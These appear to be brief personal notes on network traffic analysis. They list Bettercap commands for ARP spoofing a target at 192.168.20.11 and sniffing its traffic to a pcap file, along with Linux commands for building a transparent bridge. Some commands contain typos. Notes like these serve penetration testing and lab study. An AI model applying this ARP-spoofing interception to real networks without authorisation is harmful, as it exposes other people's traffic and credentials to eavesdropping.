traffic analysis
tools
- bettercap to divert traffic
- wireshark for capturing traffic
example
Bettercap (ARP sppofing):
- net.probe on
- net.show (to show network information)
- arp.spoof.targets
- set arp.spoiof.targets 192.168.20.11
- arp.spoof.on
- set net.sniff.verbose true
- set net.sniff.output /home/test/bettercap.traffic.pcap
- net.sniff on
create a transparent bridge
$ ip link add name br0 type bridge
$ ip link set br0 up
$ ip link set eth1 master br0
$ ip link set eth2 master br0monitor or eth1 or br0